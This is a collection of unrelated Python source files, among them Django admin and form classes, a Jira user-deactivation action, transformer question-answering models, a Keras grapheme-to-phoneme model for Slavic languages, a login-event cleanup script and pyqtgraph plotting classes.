withdrawn = (self.withdrawPortion(req[0], "emg"))[0]
if withdrawn != "None":
taken[withdrawn] += 1
unpulled[req[0]] -= 1
for v in unpulled.values():
if v > 0:
partial = "True"
return (taken, unpulled, partial)
def getPackCounts(self):
cooled = []
frozen = []
with open("api/data/counts.json", "r") as counts:
cnts = json.load(counts)
for x in cnts["cooled"].values():
cooled.append(x)
for x in cnts["frozen"].values():
frozen.append(x)
res = [cooled, frozen]
return res |
from base import JiraBaseAction
class JiraDeactivateUser(JiraBaseAction):
    """StackStorm action that deactivates a Jira user account."""

    def _run(self, username):
        # Delegate to the Jira client configured by JiraBaseAction.
        result = self.jira.deactivate_user(username)
        return result
|
from dateutil import parser
class Condition(object):
    """
    The current weather conditions.

    Attributes:
        code: The condition code for the forecast (integer); the possible
            values are described at http://developer.yahoo.com/weather/#codes
            If no valid code is found, code is None.
        date: The date and time the forecast was posted, time-zone unaware
            (datetime).
        temperature: The current temperature in the units specified by the
            Units class (integer), or None when no valid value is found.
        text: A textual description of the conditions, e.g. Partly Cloudy
            (string).
    """
    def __init__(self, condition):
        self.temperature = self._parse_int(condition['temp'])
        self.date = parser.parse(condition['date'], ignoretz=True)
        self.text = condition['text']
        self.code = self._parse_int(condition['code'])

    @staticmethod
    def _parse_int(raw):
        # Mirrors the original behavior: a non-numeric string yields None,
        # while a missing key still raises KeyError at the call site.
        try:
            return int(raw)
        except ValueError:
            return None
|
import config
import transformers
import torch.nn as nn
import config_file
from transformers import (BertConfig, BertForQuestionAnswering, BertTokenizer,XLNetConfig, XLNetForQuestionAnsweringSimple,
XLNetTokenizer,XLMConfig, XLMForQuestionAnswering, XLMTokenizer,
RobertaConfig, RobertaForQuestionAnswering, RobertaTokenizer)
from transformers import RobertaModel
# Registry mapping a model-type key to (config class, QA model class,
# tokenizer class, checkpoint path, ...).  NOTE(review): the two *-finetuned
# entries carry an extra fifth element (the base model path) — code that
# unpacks exactly four elements (e.g. Generator below) will fail for them;
# confirm those keys are handled elsewhere.
MODEL_CLASSES = {
    'bert': (BertConfig, BertForQuestionAnswering, BertTokenizer,
             config_file.BERT_PATH),
    'xlnet': (XLNetConfig, XLNetForQuestionAnsweringSimple, XLNetTokenizer,
              config_file.XLNET_PATH),
    'xlm': (XLMConfig, XLMForQuestionAnswering, XLMTokenizer,
            config_file.XLM_PATH),
    'roberta': (RobertaConfig, RobertaForQuestionAnswering, RobertaTokenizer,
                config_file.ROBERTA_PATH),
    'distil-roberta': (RobertaConfig, RobertaForQuestionAnswering,
                       RobertaTokenizer, config_file.DISTIL_ROBERTA_PATH),
    'roberta-finetuned': (RobertaConfig, RobertaForQuestionAnswering,
                          RobertaTokenizer, config_file.FINETUNED_ROBERTA,
                          config_file.ROBERTA_PATH),
    'bert-finetuned': (BertConfig, BertForQuestionAnswering, BertTokenizer,
                       config_file.FINETUNED_BERT, config_file.BERT_PATH),
}
class BERTBaseUncased(nn.Module):
    """Three-way classification head over a pretrained encoder.

    NOTE(review): despite the class name, this loads a RobertaModel from
    config.BERT_PATH (while the rest of the file uses config_file.*) —
    confirm the checkpoint really is a RoBERTa one and which config module
    is authoritative.
    """

    def __init__(self):
        super(BERTBaseUncased, self).__init__()
        self.bert = transformers.RobertaModel.from_pretrained(config.BERT_PATH)
        self.bert_drop = nn.Dropout(0.3)
        # 1024 assumes a *-large hidden size — TODO confirm against checkpoint.
        self.out = nn.Linear(1024, 3)

    def forward(self, ids, mask):
        # o2 is the second element of the encoder output (pooled representation).
        # Fixed: removed `print(self.bert.layers)` — a leftover debug print;
        # RobertaModel exposes no `layers` attribute, so it raised
        # AttributeError on every forward pass.
        _, o2 = self.bert(ids, attention_mask=mask)
        bo = self.bert_drop(o2)
        output = self.out(bo)
        return output
class NER_Head(nn.Module):
def __init__(self,hidden_size,max_len):
super(NER_Head, self).__init__()
self.hidden_size=hidden_size
self.max_len=max_len
self.ner_loss=nn.CrossEntropyLoss()
self.out = nn.Linear(hidden_size*max_len, 19)
def forward(self, hid_states,ner_label):
output=self.out(hid_states.reshape(-1,self.hidden_size*self.max_len))
ner_loss=self.ner_loss(output,ner_label)
return ner_loss
class Generator(nn.Module):
    """QA model with an auxiliary pseudo-label discriminator head.

    forward() returns (loss, start_logits, end_logits): in training mode
    (start_positions given) only loss is populated — QA span loss plus the
    discriminator's BCE loss; in inference mode only the span logits are.

    NOTE(review): unpacking MODEL_CLASSES into four elements fails for the
    five-element *-finetuned entries — confirm which model_type values are
    actually used with this class.
    """

    def __init__(self, args):
        super(Generator, self).__init__()
        self.config_class, self.model_class, self.tokenizer_class, self.path_class = MODEL_CLASSES[args.model_type]
        self.model = self.model_class.from_pretrained(self.path_class)
        # Discriminator head over the first encoder layer's [CLS] state.
        # 1024 assumes a *-large hidden size — TODO confirm.
        self.dis = nn.Linear(1024, 1)
        self.dis_loss_fn = nn.BCEWithLogitsLoss()

    def forward(self, input_ids=None, attention_mask=None, start_positions=None,
                end_positions=None, is_pseudo=None):
        output = self.model(input_ids=input_ids, attention_mask=attention_mask,
                            start_positions=start_positions,
                            end_positions=end_positions,
                            output_hidden_states=True)
        loss = None
        start_logits = None
        end_logits = None
        # Fixed: `!= None` replaced with the idiomatic `is not None` (PEP 8);
        # removed dead commented-out debug prints.
        if start_positions is not None:
            loss = output['loss']
            hid_states = output['hidden_states']
            # hidden_states[1][:, 0, :]: the [CLS]-position state of the first
            # encoder layer feeds the discriminator.
            dis_out = self.dis(hid_states[1][:, 0, :])
            dis_loss = self.dis_loss_fn(dis_out.squeeze(), is_pseudo.type_as(dis_out))
            loss += dis_loss
        else:
            start_logits = output['start_logits']
            end_logits = output['end_logits']
        return loss, start_logits, end_logits
class Discriminator(nn.Module):
    """Binary classifier over a pretrained RoBERTa encoder's pooled output.

    Returns a sigmoid probability per example.
    """

    def __init__(self, args):
        super(Discriminator, self).__init__()
        self.model = RobertaModel.from_pretrained(args.discriminator_path)
        # 1024 assumes a *-large hidden size — TODO confirm.
        self.linear = nn.Linear(1024, 1)

    def forward(self, token_ids, token_mask):
        encoded = self.model(token_ids, token_mask)
        pooled = encoded['pooler_output']
        logits = self.linear(pooled)
        return nn.Sigmoid()(logits)
class Generate(nn.Module):
    """Plain QA model wrapper (Generator without the discriminator head).

    forward() returns (loss, start_logits, end_logits); loss is populated only
    when start_positions is given, the span logits always.
    """

    def __init__(self, args):
        super(Generate, self).__init__()
        self.config_class, self.model_class, self.tokenizer_class, self.path_class = MODEL_CLASSES[args.model_type]
        self.model = self.model_class.from_pretrained(self.path_class)

    def forward(self, input_ids=None, attention_mask=None, start_positions=None,
                end_positions=None, is_pseudo=None):
        # is_pseudo is accepted only for signature parity with Generator.
        output = self.model(input_ids=input_ids, attention_mask=attention_mask,
                            start_positions=start_positions,
                            end_positions=end_positions)
        loss = None
        # Fixed: `!= None` -> `is not None`; removed large blocks of dead,
        # commented-out experiment code.
        if start_positions is not None:
            loss = output['loss']
        # Span logits are extracted in both training and inference modes.
        start_logits = output['start_logits']
        end_logits = output['end_logits']
        return loss, start_logits, end_logits
|
#!/usr/bin/env python
"""Delete login user events older than a given number of days.
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
from datetime import datetime, timedelta
import click
from byceps.database import db
from byceps.services.user.models.event import UserEvent as DbUserEvent
from byceps.util.system import get_config_filename_from_env_or_exit
from _util import app_context
@click.command()
@click.option(
    '--dry-run', is_flag=True, help='count but do not delete affected records',
)
@click.argument('minimum_age_in_days', type=int)
def execute(dry_run, minimum_age_in_days):
    """Delete user login events older than MINIMUM_AGE_IN_DAYS days.

    With --dry-run the affected records are counted but not committed.
    """
    latest_occurred_at = get_latest_occurred_at(minimum_age_in_days)

    click.secho(
        f'Deleting all user login events older than {minimum_age_in_days} days '
        f'(i.e. before {latest_occurred_at:%Y-%m-%d %H:%M:%S}) ...'
    )

    num_deleted = delete_user_login_events_before(latest_occurred_at, dry_run)
    click.secho(f'{num_deleted} user login events deleted.')

    if dry_run:
        click.secho(
            # Fixed: was an f-string with no placeholders (flake8 F541).
            'This was a dry run; no records have been deleted.', fg='yellow'
        )
def get_latest_occurred_at(minimum_age_in_days: int) -> datetime:
    """Return the cutoff timestamp: UTC now minus the given number of days
    (naive datetime, matching the values stored in the database)."""
    cutoff_delta = timedelta(days=minimum_age_in_days)
    return datetime.utcnow() - cutoff_delta
def delete_user_login_events_before(
    latest_occurred_at: datetime, dry_run: bool
) -> int:
    """Delete 'user-logged-in' events that occurred at or before the cutoff.

    Returns the number of affected rows.  When *dry_run* is true the DELETE
    is issued but never committed.
    """
    query = (
        DbUserEvent.query
        .filter_by(event_type='user-logged-in')
        .filter(DbUserEvent.occurred_at <= latest_occurred_at)
    )
    num_deleted = query.delete()

    if not dry_run:
        db.session.commit()

    return num_deleted
if __name__ == '__main__':
    # Resolve the BYCEPS config file from the environment, then run the
    # click command inside an application context (needed for DB access).
    config_filename = get_config_filename_from_env_or_exit()
    with app_context(config_filename):
        execute()
|
from django.contrib import admin, messages
from django.db import IntegrityError
from requests import HTTPError
from .api import (
make_import_language_list,
)
from .models import (
ListLanguagesModel,
TranslatedTextModel,
)
class LanguageListAdmin(admin.ModelAdmin):
    """Admin for the list of languages available for translation."""

    list_display = [
        'code',
        'name',
    ]
    actions = [
        'make_import',
    ]

    def make_import(self, request, queryset):
        """Import the available-language list from the translation API.

        Returns True on success, False when an error was reported to the
        user.  (The return value is ignored when run as an admin action.)
        """
        try:
            make_import_language_list()
        except IntegrityError:
            messages.error(
                request,
                # Fixed grammar: "при запись" -> "при записи".
                'Произошла ошибка при записи в БД',
            )
            return False
        except HTTPError as ex:
            messages.error(
                request,
                str(ex),
            )
            return False
        return True

    make_import.short_description = 'Выполнить импорт списка доступных языков'

    # The import runs whenever the "add" template is requested; the changelist
    # is rendered afterwards instead of the add form.
    def add_view(self, request, form_url='', extra_context=None):
        # Fixed: the success message used to be shown even when make_import
        # had already reported an error.
        if self.make_import(
            request=request,
            queryset=None,
        ):
            messages.info(
                request,
                'Импорт записей был успешно выполнен'
            )
        return super().changelist_view(
            request=request,
            extra_context=extra_context,
        )
class TranslateTextAdmin(admin.ModelAdmin):
    """Admin for translated texts; runs translation on save or via bulk action."""

    list_display = [
        'input_text',
        'language',
        'output_text',
    ]
    # Bulk action: translate every selected record from the changelist.
    actions = [
        'translate_text_in_queryset',
    ]

    def translate_text_in_queryset(self, request, queryset):
        """Translate all selected records; stop and report on the first HTTP error."""
        try:
            for record in queryset.select_related('language'):
                record.translate_text_with_html()
        except HTTPError as ex:
            messages.error(request, str(ex))

    translate_text_in_queryset.short_description = 'Выполнить перевод'

    def response_post_save_change(self, request, obj):
        """Run the translation right after a record has been saved."""
        try:
            obj.translate_text_with_html()
        except HTTPError as ex:
            messages.error(request, str(ex))
        return super().response_post_save_change(request, obj)
# Wire both admin classes to their models.
admin.site.register(ListLanguagesModel, LanguageListAdmin)
admin.site.register(TranslatedTextModel, TranslateTextAdmin)
|
from tensorflow.keras.layers import *
from tensorflow.keras.models import Model
import os
import numpy as np
import tensorflow.keras.backend as K
import unicodedata
# Load training pairs: hand-corrected forms plus raw training data.
# Each TSV row is [language, orthography, IPA transcription].
fixed = [l.strip().split('\t') for l in open('corrected_forms.tsv', 'r')]
nonfixed = [l.strip().split('\t') for l in open('training_data.tsv', 'r')]
corr_dict = {(l[0], l[1]): l[2] for l in fixed}
ipa_dict = {(l[0], l[1]): l[2] for l in nonfixed}
cutoff = len(fixed)
# Keep only forms with reasonably short transcriptions.
text = [l for l in fixed + nonfixed if len(l[2]) < 30]

def _strip_marks(s):
    # Drop syllable dots and parentheses; lower-case everything.
    return s.replace('.', '').replace('(', '').replace(')', '').lower()

lang_raw = [l[0] for l in text]
input_raw = [list(_strip_marks(l[-2])) for l in text]
# Replace the transcription's own delimiters with '[' ... ']'.
output_raw = [['['] + list(_strip_marks(l[-1]))[1:-1] + [']'] for l in text]
langs = sorted(set(lang_raw))
input_segs = sorted(set([s for w in input_raw for s in w]))
output_segs = sorted(set([s for w in output_raw for s in w]))
N = len(text)
L = len(langs)
X = len(input_segs)
Y = len(output_segs)
T_x = max([len(l) for l in input_raw])
T_y = max([len(l) for l in output_raw])
# One-hot training tensors: language ID, encoder input, decoder input/target.
lang_id = np.zeros([N, T_x, L], dtype=np.float32)
encoder_input = np.zeros([N, T_x, X], dtype=np.float32)
decoder_input = np.zeros([N, T_y, Y], dtype=np.float32)
decoder_output = np.zeros([N, T_y, Y], dtype=np.float32)
for i in range(N):
    for j, s in enumerate(input_raw[i]):
        encoder_input[i, j, input_segs.index(s)] = 1.
        lang_id[i, j, langs.index(lang_raw[i])] = 1.
    for j, s in enumerate(output_raw[i]):
        decoder_input[i, j, output_segs.index(s)] = 1.
        if j > 0:
            # Teacher forcing: the target at step j-1 is the symbol at step j.
            decoder_output[i, j - 1, output_segs.index(s)] = 1.
lang_id_ = Input((T_x, L))
encoder_input_ = Input((T_x, X))
decoder_input_ = Input((T_y, Y))
def nonmonotonic_alignment(args):
    """Soft non-monotonic attention: probability of each encoder position
    aligning with each decoder position, normalized over the encoder axis."""
    h_enc, h_dec, max_encoder_seq_length, latent_dim = args
    scores = dot([Dense(latent_dim)(h_enc), h_dec], axes=-1, normalize=False)
    return K.softmax(scores, -2)
def gen_output(args):
    """Expected output distribution: emission probabilities weighted by the
    alignment probabilities, summed over encoder positions."""
    alignment_probs, emission_probs = args
    weighted = K.expand_dims(alignment_probs, -1) * emission_probs
    return K.sum(weighted, -3)
def gen_emission_probs(args):
    """Per (encoder position, decoder position) emission distribution over
    output symbols."""
    h_enc, h_dec, max_encoder_seq_length, max_decoder_seq_length, num_decoder_tokens, hidden_dim = args
    # Broadcast encoder states across decoder steps and vice versa so every
    # (i, j) pair sees both hidden states concatenated.
    enc_tiled = K.tile(K.expand_dims(h_enc, -2), [1, 1, max_decoder_seq_length, 1])
    dec_tiled = K.tile(K.expand_dims(h_dec, -3), [1, max_encoder_seq_length, 1, 1])
    pair_states = K.concatenate([enc_tiled, dec_tiled], -1)
    # Emission probabilities via a tanh bottleneck and a softmax projection.
    hidden = Dense(hidden_dim * 3, activation='tanh')(pair_states)
    return Dense(num_decoder_tokens, activation='softmax')(hidden)
# Embed the language one-hot sequence and the input characters.
lang_embed = Dense(64)(lang_id_)
input_embed = Dense(64)(encoder_input_)
# NOTE(review): `input_` (language + character embedding) is built but never
# consumed — the encoder below reads encoder_input_ directly, so the language
# input does not influence the encoder.  Confirm whether this is intentional;
# changing it would invalidate the saved weights in g2p.h5.
input_ = concatenate([lang_embed,input_embed])
h_dec = LSTM(64, return_sequences=True)(decoder_input_)
h_enc = Bidirectional(LSTM(64,return_sequences=True))(encoder_input_)
alignment_probs = Lambda(nonmonotonic_alignment)([h_enc,h_dec,T_x,64])
# Named identity layer so the attention matrix can be inspected by name.
alignment_probs = Lambda(lambda x:x, name='attention')(alignment_probs)
emission_probs = gen_emission_probs([h_enc,h_dec,T_x,T_y,Y,64])
decoder_output_ = Lambda(gen_output)([alignment_probs,emission_probs])
model = Model([lang_id_, encoder_input_, decoder_input_], decoder_output_)
model.compile(optimizer='adam', loss='categorical_crossentropy',metrics=['accuracy'])
#model.save_weights('g2p.h5')
# Resume from previously trained weights.
model.load_weights('g2p.h5')
# Fine-tune on the hand-corrected subset only, checkpointing each epoch.
for i in range(10):
    #indices = np.arange(len(text))
    # indices = np.concatenate([np.arange(cutoff),np.random.randint(cutoff,len(text),cutoff*10)])
    # model.fit([lang_id[indices], encoder_input[indices], decoder_input[indices]], decoder_output[indices], epochs=1)
    model.fit([lang_id[:cutoff], encoder_input[:cutoff], decoder_input[:cutoff]], decoder_output[:cutoff], batch_size=32, epochs=1)
    model.save('g2p.h5')
def decode_sequence(input_seq, lang_id, attn=False):
    """Greedy-decode the IPA transcription of *input_seq* for language *lang_id*.

    Returns the list of predicted output symbols including the terminating
    ']'.  Characters not in the training alphabet are skipped; the language
    one-hot is still set for every input position.  *attn* is currently
    unused (kept for interface compatibility).
    """
    chars = list(input_seq)
    lang_onehot = np.zeros([1, T_x, L])
    input_onehot = np.zeros([1, T_x, X])
    for pos, ch in enumerate(chars):
        if ch in input_segs:
            input_onehot[0, pos, input_segs.index(ch)] = 1.
        lang_onehot[0, pos, langs.index(lang_id)] = 1.
    # Greedy decoding: seed with '[' and feed back the argmax symbol.
    decoded = []
    target_seq = np.zeros((1, T_y, Y))
    target_seq[0, 0, output_segs.index('[')] = 1.
    for t in range(T_y - 1):
        preds = model.predict([lang_onehot, input_onehot, target_seq])
        best = np.argmax(preds[:, t, :])
        target_seq[0, t + 1, best] = 1.
        symbol = output_segs[best]
        decoded.append(symbol)
        if symbol == ']':
            break
    return decoded
# Reference IPA transcriptions keyed by (language, orthography).
old_IPA = [l.strip().split('\t') for l in open('old_IPA.tsv','r')]
old_IPA_key = {(l[1],l[2]):l[3] for l in old_IPA}
ocskey = """i;i
y;ɨ
u;u
ь;ɪ
ъ;ʊ
e;ɛ
o;ɔ
ę;ɛ̃
ę;ɛ̃
ǫ;ɔ̃
ǫ;ɔ̃
ě;æ
ě;æ
p;p
b;b
m;m
w;w
t;t
d;d
s;s
z;z
c;t͡s
ʒ;dz
n;n
l;l
r;r
č;t͡ʃ
š;ʃ
ž;ʒ
j;j
lʹ;ʎ
nʹ;ɲ
rʹ;rʲ
lj;ʎ
nj;ɲ
rj;rʲ
k;k
g;g
x;x"""
# Parse the OCS "grapheme;ipa" key: one pair per line, sorted longest
# grapheme first so digraphs are replaced before single characters.
ocskey = ocskey.split('\n')
ocskey = [l.split(';') for l in ocskey]
ocskey = sorted(ocskey,key=lambda x:len(x[0]),reverse=True)
forms = [l.strip().split('\t') for l in open('../derksen_slavic_fixed.tsv','r')]
for i,l in enumerate(forms):
    #if l[3] == 'russian':
    # Normalize transliteration quirks (apostrophe, ë, ĺ) in the orthography.
    forms[i][4] = bytes(l[4],'utf8').decode('utf8').replace("'","ʹ").replace('ë','jó').replace('ĺ','lʹ')
for l in forms:
    etym = l[0]
    lang = l[3]
    orth = unicodedata.normalize('NFC',l[4]).lower()
    if lang != 'church_slavic' and lang != 'old_church_slavic':
        # Prefer hand-corrected transcriptions ('C'), then raw training data
        # ('I'), then fall back to the model's prediction.
        if (lang,orth) in corr_dict.keys():
            print(lang,orth,corr_dict[(lang,orth)],'C')
        elif (lang,orth) in ipa_dict.keys():
            print(lang,orth,ipa_dict[(lang,orth)],'I')
        else:
            if (lang,orth) in old_IPA_key.keys():
                print(lang,orth,''.join(decode_sequence(orth,lang)[:-1]),old_IPA_key[(lang,orth)])
            else:
                print(lang,orth,''.join(decode_sequence(orth,lang)[:-1]))
    else:
        # (Old) Church Slavic is transcribed deterministically via the key.
        phon = orth
        for k in ocskey:
            phon = phon.replace(k[0],k[1])
        print(lang,orth,phon)
|
from django import forms
from .models import Comments
class CommentsForm(forms.ModelForm):
    """ModelForm for visitor comments.

    Server-managed fields are excluded; the validation messages are
    user-facing (zh-CN) and must not be altered.
    """

    class Meta:
        model = Comments
        # These bookkeeping fields are set by the application, not the visitor.
        exclude = ['is_delete', 'create_time', 'update_time']
        error_messages = {
            'author': {
                'max_length': '亲, 名字长度不能超过10位数哦',
                'required': '亲, 名字不能为空哦',
            },
            'content': {
                'required': '亲, 内容不能为空哦'
            },
            'mail': {
                'required': '亲, 邮箱不能为空哦'
            }
        }
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 12 14:43:23 2017
@author: jjcao
"""
import torch
import torch.nn as nn
import functools
#
class ResUnetGenerator(nn.Module):
    """U-Net-style generator (work in progress).

    NOTE(review): this module cannot run yet — forward() references
    self.netFeat / self.pool1 / self.pool2 / self.pool4 / self.pool8 /
    self.final, none of which are created in __init__, and the
    UnetDown/UnetUp/UnetCenter skeletons below are invoked with keyword
    arguments (output_nc, norm_layer, use_dropout, outermost) their __init__
    signatures do not accept.  The intended architecture still needs to be
    finished.
    """

    def __init__(self, input_nc, output_nc, num_downs, ngf=64,
                 norm_layer=nn.BatchNorm2d, use_dropout=False, gpu_ids=[]):
        # BUG FIX: super() previously referenced the undefined name
        # `UnetBGenerator`, raising NameError on construction.
        super(ResUnetGenerator, self).__init__()
        self.gpu_ids = gpu_ids
        # Construct the unet structure: four widening down-sampling stages ...
        planes = [ngf, ngf*2, ngf*4, ngf*8]
        self.down = [UnetDown(input_nc, output_nc=planes[0], norm_layer=norm_layer)]
        self.down += [UnetDown(planes[0], output_nc=planes[1], norm_layer=norm_layer)]
        self.down += [UnetDown(planes[1], output_nc=planes[2], norm_layer=norm_layer)]
        self.down += [UnetDown(planes[2], output_nc=planes[3], norm_layer=norm_layer)]
        # ... plus (num_downs - 5) constant-width stages at the bottom.
        for i in range(num_downs - 5):
            self.down += [UnetDown(planes[3], output_nc=planes[3], norm_layer=norm_layer, use_dropout=use_dropout)]
        self.center = [UnetCenter(planes[3], output_nc=planes[3])]
        self.up = []
        for i in range(num_downs - 5):
            self.up += [UnetUp(planes[3], output_nc=planes[3], norm_layer=norm_layer, use_dropout=use_dropout)]
        self.up += [UnetUp(planes[3], output_nc=planes[2], norm_layer=norm_layer)]
        self.up += [UnetUp(planes[2], output_nc=planes[1], norm_layer=norm_layer)]
        self.up += [UnetUp(planes[1], output_nc=planes[0], norm_layer=norm_layer)]
        self.up += [UnetUp(planes[0], output_nc=output_nc, norm_layer=norm_layer, outermost=True)]
        self.down = nn.Sequential(*self.down)
        # self.model = self.down + self.center + self.up
        # self.model = nn.Sequential(*model)

    def forward(self, input):
        # NOTE(review): the attributes below are never created (see class
        # docstring) — this path is unimplemented.
        x = self.netFeat.forward(input)
        if self.gpu_ids and isinstance(input.data, torch.cuda.FloatTensor):
            # Spread the pooling branches across the configured GPUs.
            p1 = nn.parallel.data_parallel(self.pool1, x, self.gpu_ids)
            p2 = nn.parallel.data_parallel(self.pool2, x, self.gpu_ids)
            p4 = nn.parallel.data_parallel(self.pool4, x, self.gpu_ids)
            p8 = nn.parallel.data_parallel(self.pool8, x, self.gpu_ids)
            out = torch.cat([x, p1, p2, p4, p8], 1)
            return nn.parallel.data_parallel(self.final, out, self.gpu_ids)
        else:
            p1 = self.pool1(x)
            p2 = self.pool2(x)
            p4 = self.pool4(x)
            p8 = self.pool8(x)
            out = torch.cat([x, p1, p2, p4, p8], 1)
            return self.final(out)
class UnetCenter(nn.Module):
    """Bottleneck block of the U-Net (skeleton — not implemented yet)."""

    def __init__(self, in_size, out_size, is_batchnorm):
        super(UnetCenter, self).__init__()

    def forward(self, inputs):
        # BUG FIX: the method body was missing entirely, which made the whole
        # module a SyntaxError.  Fail explicitly until it is implemented.
        raise NotImplementedError('UnetCenter.forward is not implemented yet')
class UnetDown(nn.Module):
    """Down-sampling block of the U-Net (skeleton — not implemented yet)."""

    def __init__(self, in_size, out_size, is_batchnorm):
        super(UnetDown, self).__init__()

    def forward(self, inputs):
        # BUG FIX: the method body was missing entirely, which made the whole
        # module a SyntaxError.  Fail explicitly until it is implemented.
        raise NotImplementedError('UnetDown.forward is not implemented yet')
class UnetUp(nn.Module):
    """Up-sampling block of the U-Net (skeleton — not implemented yet)."""

    def __init__(self, in_size, out_size, is_deconv):
        super(UnetUp, self).__init__()

    def forward(self, inputs1, inputs2):
        # BUG FIX: the method body was missing entirely, which made the whole
        # module a SyntaxError.  Fail explicitly until it is implemented.
        raise NotImplementedError('UnetUp.forward is not implemented yet')
|
import logging
log = logging.getLogger(__name__)
import itertools
import importlib
from functools import partial
from collections import defaultdict
import numpy as np
import pandas as pd
import pyqtgraph as pg
from atom.api import (Unicode, Float, Tuple, Int, Typed, Property, Atom, Bool,
Enum, List, Dict, Callable, Value)
from enaml.application import deferred_call, timed_call
from enaml.colors import parse_color
from enaml.core.api import Looper, Declarative, d_, d_func
from enaml.qt.QtGui import QColor
from psi.util import SignalBuffer, ConfigurationException
from psi.core.enaml.api import load_manifests, PSIContribution
from psi.controller.calibration import util
from psi.context.context_item import ContextMeta
################################################################################
# Utility functions
################################################################################
def get_x_fft(fs, duration):
    """Return log10-scaled rFFT bin frequencies for a signal of the given
    sampling rate and duration.  The DC bin maps to -inf (log10 of 0)."""
    n_time = int(fs * duration)
    freq = np.fft.rfftfreq(n_time, fs**-1)
    return np.log10(freq)
def get_color_cycle(name):
    """Resolve a dotted ``module.attribute`` palette name and return an
    endless iterator cycling over that palette's ``colors`` sequence."""
    module_name, cmap_name = name.rsplit('.', 1)
    palette = getattr(importlib.import_module(module_name), cmap_name)
    return itertools.cycle(palette.colors)
def make_color(color):
    """Coerce *color* — an RGB(A) tuple or a color-name/hex string — to a
    QColor.

    Raises ValueError for any other type.
    """
    if isinstance(color, tuple):
        return QColor(*color)
    elif isinstance(color, str):
        return QColor(color)
    else:
        # BUG FIX: the offending value was passed as a second positional
        # argument instead of being %-formatted into the message, so it
        # never appeared in the error text.
        raise ValueError('Unknown color %r' % (color,))
################################################################################
# Style mixins
################################################################################
class ColorCycleMixin(Declarative):
    """Mixin that assigns each plot key a stable pen color drawn from a cycle."""

    #: Define the pen color cycle. Can be a list of colors or a string
    #: indicating the color palette to use in palettable.
    pen_color_cycle = d_(Typed(object))

    # Maps plot key -> assigned color; unseen keys draw the next cycle color.
    _plot_colors = Typed(dict)

    def _make_plot_cycle(self):
        if isinstance(self.pen_color_cycle, str):
            # e.g. a dotted palettable palette name.
            cycle = get_color_cycle(self.pen_color_cycle)
        else:
            cycle = itertools.cycle(self.pen_color_cycle)
        return defaultdict(lambda: next(cycle))

    @d_func
    def get_pen_color(self, key):
        # Build the key->color mapping lazily on first use.
        if self._plot_colors is None:
            self._plot_colors = self._make_plot_cycle()
        color = self._plot_colors[key]
        if not isinstance(color, str):
            return QColor(*color)
        else:
            return QColor(color)

    def _observe_pen_color_cycle(self, event):
        # Changing the cycle invalidates every previously assigned color.
        self._plot_colors = self._make_plot_cycle()
        self.reset_plots()

    def reset_plots(self):
        # Subclasses must rebuild their plot items with the new colors.
        raise NotImplementedError
################################################################################
# Supporting classes
################################################################################
class BaseDataRange(Atom):
    """Tracks the currently-visible x range for a plot container."""

    container = Typed(object)

    # Size of display window
    span = Float(1)

    # Delay before clearing window once data has "scrolled off" the window.
    delay = Float(0)

    # Current visible data range
    current_range = Tuple(Float(), Float())

    def add_source(self, source):
        # Re-evaluate the range whenever the source reports new data.
        cb = partial(self.source_added, source=source)
        source.add_callback(cb)

    def _default_current_range(self):
        return 0, self.span

    def _observe_delay(self, event):
        self._update_range()

    def _observe_span(self, event):
        self._update_range()

    def _update_range(self):
        # Subclasses decide how current_range follows incoming data.
        raise NotImplementedError
class EpochDataRange(BaseDataRange):
    """Data range sized to the longest epoch seen so far."""

    max_duration = Float()

    def source_added(self, data, source):
        # Track the longest epoch (in seconds) across all appended batches.
        n = [len(d['signal']) for d in data]
        max_duration = max(n) / source.fs
        self.max_duration = max(max_duration, self.max_duration)

    def _observe_max_duration(self, event):
        self._update_range()

    def _update_range(self):
        self.current_range = 0, self.max_duration
class ChannelDataRange(BaseDataRange):
    """Scrolling data range that follows the most recent sample time."""

    # Automatically updated. Indicates last "seen" time based on all data
    # sources reporting to this range.
    current_time = Float(0)
    # Per-source running totals of samples and seconds received.
    current_samples = Typed(defaultdict, (int,))
    current_times = Typed(defaultdict, (float,))

    def _observe_current_time(self, event):
        self._update_range()

    def _update_range(self):
        # Snap the window to span-sized pages, shifted back by the delay.
        low_value = (self.current_time//self.span)*self.span - self.delay
        high_value = low_value+self.span
        self.current_range = low_value, high_value

    def add_event_source(self, source):
        cb = partial(self.event_source_added, source=source)
        source.add_callback(cb)

    def source_added(self, data, source):
        # Continuous sources report sample blocks; convert count to seconds.
        self.current_samples[source] += data.shape[-1]
        self.current_times[source] = self.current_samples[source]/source.fs
        self.current_time = max(self.current_times.values())

    def event_source_added(self, data, source):
        # Event sources report (event, timestamp) pairs; use the last timestamp.
        self.current_times[source] = data[-1][1]
        self.current_time = max(self.current_times.values())
def create_container(children, x_axis=None):
    """Assemble a pyqtgraph layout stacking *children* vertically, one row
    per child (y axis in column 0, viewbox in column 1), with an optional
    shared x axis below the last row.  Child viewboxes are x-linked to the
    first child's viewbox.
    """
    container = pg.GraphicsLayout()
    container.setSpacing(10)

    # Add the x and y axes to the layout, along with the viewbox.
    for i, child in enumerate(children):
        container.addItem(child.y_axis, i, 0)
        container.addItem(child.viewbox, i, 1)

    # BUG FIX: the shared x axis used to be re-added on *every* loop
    # iteration; add it once, in the row below the last child.
    if x_axis is not None:
        container.addItem(x_axis, len(children), 1)

    # Link the child viewboxes together so they pan/zoom in unison.
    for child in children[1:]:
        child.viewbox.setXLink(children[0].viewbox)

    return container
################################################################################
# Pattern containers
################################################################################
class MultiPlotContainer(Looper, PSIContribution):
    """Looper that instantiates one plot container per iterable value."""

    group = d_(Unicode())
    containers = d_(Dict())
    _workbench = Value()
    selected_item = Value()

    def refresh_items(self):
        super().refresh_items()
        if not self.iterable:
            return
        # Map each iterable value (stringified) to its container.
        self.containers = {
            str(value): item[0].container
            for value, item in zip(self.iterable, self.items)
        }
        load_manifests(self.items, self._workbench)
        for item in self.items:
            load_manifests(item, self._workbench)
            load_manifests(item[0].children, self._workbench)
            deferred_call(item[0].format_container)
################################################################################
# Containers (defines a shared set of containers across axes)
################################################################################
class BasePlotContainer(PSIContribution):
    """Base contribution wrapping a pyqtgraph layout with a shared x axis."""

    label = d_(Unicode())

    container = Typed(pg.GraphicsWidget)
    x_axis = Typed(pg.AxisItem)
    base_viewbox = Property()
    legend = Typed(pg.LegendItem)

    def _default_container(self):
        return create_container(self.children, self.x_axis)

    def _default_legend(self):
        legend = pg.LegendItem()
        legend.setParentItem(self.container)
        return legend

    def _get_base_viewbox(self):
